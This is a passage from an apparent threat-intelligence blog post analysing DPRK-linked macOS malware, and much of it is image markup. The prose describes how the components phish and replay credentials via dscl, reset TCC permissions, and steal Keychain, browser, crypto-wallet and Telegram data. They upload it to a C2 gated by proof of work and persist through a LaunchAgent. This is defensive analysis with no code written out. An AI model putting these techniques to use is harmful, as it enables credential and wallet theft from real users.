srcset="https://substackcdn.com/image/fetch/$s_!CoIh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png 424w, https://substackcdn.com/image/fetch/$s_!CoIh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png 848w, https://substackcdn.com/image/fetch/$s_!CoIh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!CoIh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CoIh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png" width="1456" height="946" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/20c8d49e-45a6-47de-9b72-f12ec54678ba_2386x1550.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:946,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:771987,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F20c8d49e-45a6-47de-9b72-f12ec54678ba_2386x1550.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CoIh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png 424w, https://substackcdn.com/image/fetch/$s_!CoIh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png 848w, https://substackcdn.com/image/fetch/$s_!CoIh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!CoIh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Component <strong>T65A</strong> prompts the user for their credentials, stores them, and replays them whenever necessary using the native <strong>macOS</strong> utility <em>dscl</em>.</p><p><em>dscl</em> (Directory Service command line) is normally used to interact with the system&#8217;s directory services, including <strong>managing user accounts</strong>, groups, <strong>authentication</strong> <strong>data</strong>, and other attributes stored in the local directory or network directory services such as <strong>LDAP</strong> or <strong>Active</strong> <strong>Directory</strong>.</p><p>Coincidentally, <strong>DQEZ</strong> is virtually the same component, just with different deobfuscation output, but it follows the exact same execution flow. </p><p>I told you these weren&#8217;t the <em>brightest</em> <em>bulbs in the house</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!m08n!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!m08n!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png 424w, https://substackcdn.com/image/fetch/$s_!m08n!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png 848w, https://substackcdn.com/image/fetch/$s_!m08n!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!m08n!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!m08n!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png" width="1456" height="946" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f336862d-00eb-4364-9e5e-ab3544ba5e2b_2386x1550.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:946,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1068603,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff336862d-00eb-4364-9e5e-ab3544ba5e2b_2386x1550.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!m08n!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png 424w, https://substackcdn.com/image/fetch/$s_!m08n!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png 848w, https://substackcdn.com/image/fetch/$s_!m08n!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!m08n!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe0193e4d-2471-40d7-89cc-eeb29c3cf2a6_2386x1550.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Moving on, <strong>0CRW</strong> is where the <em>real action</em> starts. It defines a C2 server with a specific endpoint, derives a hardware-unique ID for the infected machine, and uses it to identify the host to the C2. It also runs <em>tccutil</em> to <strong><a href="https://attack.mitre.org/techniques/T1548/006/">reset</a></strong><a href="https://attack.mitre.org/techniques/T1548/006/"> </a><strong><a href="https://attack.mitre.org/techniques/T1548/006/">TCC</a></strong><a href="https://attack.mitre.org/techniques/T1548/006/"> </a><strong><a href="https://attack.mitre.org/techniques/T1548/006/">permissions</a></strong> on the host and dumps both <strong>Apple</strong> <strong>Notes</strong> and <strong>small files</strong> from <em>~/Desktop</em>, <em>~/Downloads</em>, and <em>~/Documents</em>, then zips and ships everything to the C2.</p><p>Classic behaviour so far, but there&#8217;s a catch: the server won&#8217;t just receive the data as-is, <strong>it will require a PoW</strong> <em>(<a href="https://en.wikipedia.org/wiki/Proof_of_work">Proof of Work</a>)</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!omCb!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!omCb!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png 424w, https://substackcdn.com/image/fetch/$s_!omCb!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png 848w, https://substackcdn.com/image/fetch/$s_!omCb!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png 1272w, https://substackcdn.com/image/fetch/$s_!omCb!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!omCb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png" width="1456" height="455" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9515052a-28e6-4067-8070-270ba690c244_2322x726.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:455,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:295180,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9515052a-28e6-4067-8070-270ba690c244_2322x726.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!omCb!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png 424w, https://substackcdn.com/image/fetch/$s_!omCb!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png 848w, https://substackcdn.com/image/fetch/$s_!omCb!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png 1272w, https://substackcdn.com/image/fetch/$s_!omCb!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8e476bd2-7ee0-43d0-939a-7d6c082f927a_2322x726.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Someone&#8217;s <strong>definitely</strong> tired of me spamming their C2</figcaption></figure></div><p>We&#8217;ve never seen <strong>DPRK</strong> malware require <strong>Proof of Work</strong> to protect their C2 from our spammy, friendly interview requests. That detail stuck with me for a while, so we gave it a name: <strong>POWerful Armadillo</strong>.</p><p>A challenge, then? I&#8217;m always up for one. But let me finish kicking over your sandcastle first, then I&#8217;ll move on to stomping on your shovel and bucket. We&#8217;ll be back here in a minute.</p><p>Let&#8217;s backtrack a little, as we still have two more components to explore: <strong>2KVS</strong> and <strong>01HY</strong>, which were loaded in the first stage.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!KSdv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!KSdv!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png 424w, https://substackcdn.com/image/fetch/$s_!KSdv!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png 848w, https://substackcdn.com/image/fetch/$s_!KSdv!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!KSdv!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!KSdv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png" width="1456" height="946" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cd2ff56e-b1ce-46a9-b030-4aa259f726f0_2386x1550.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:946,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1116372,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd2ff56e-b1ce-46a9-b030-4aa259f726f0_2386x1550.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!KSdv!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png 424w, https://substackcdn.com/image/fetch/$s_!KSdv!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png 848w, https://substackcdn.com/image/fetch/$s_!KSdv!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!KSdv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F226a30cf-3b41-4342-bfa3-ec425b7d66e4_2386x1550.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>2KVS</strong> <strong>is the stealer</strong>. It targets <strong>macOS</strong> <strong>Keychain</strong>, a long list of desktop <strong>crypto wallets/configs</strong>, <strong>browser</strong> <strong>credentials</strong> and <strong>cookies</strong> (Chromium + Firefox, including extension storage), and <strong>Telegram</strong> <strong>Desktop</strong> data, then stages everything under <em>/tmp</em>, zips it, and uploads it to the C2 (again with <strong>PoW</strong> <strong>gating</strong>).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2dHU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2dHU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png 424w, https://substackcdn.com/image/fetch/$s_!2dHU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png 848w, https://substackcdn.com/image/fetch/$s_!2dHU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!2dHU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2dHU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png" width="1456" height="967" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/175801bf-c630-466f-85f7-871fa271fc79_2334x1550.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:967,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:732656,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F175801bf-c630-466f-85f7-871fa271fc79_2334x1550.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2dHU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png 424w, https://substackcdn.com/image/fetch/$s_!2dHU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png 848w, https://substackcdn.com/image/fetch/$s_!2dHU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png 1272w, https://substackcdn.com/image/fetch/$s_!2dHU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F499c6b4d-d95c-40c2-b8c3-bae3e06abb1c_2334x1550.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>01HY</strong> establishes persistence by creating a <em>per-host</em> <strong><a href="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html">LaunchAgent</a></strong> tied to the machine&#8217;s <strong>Hardware 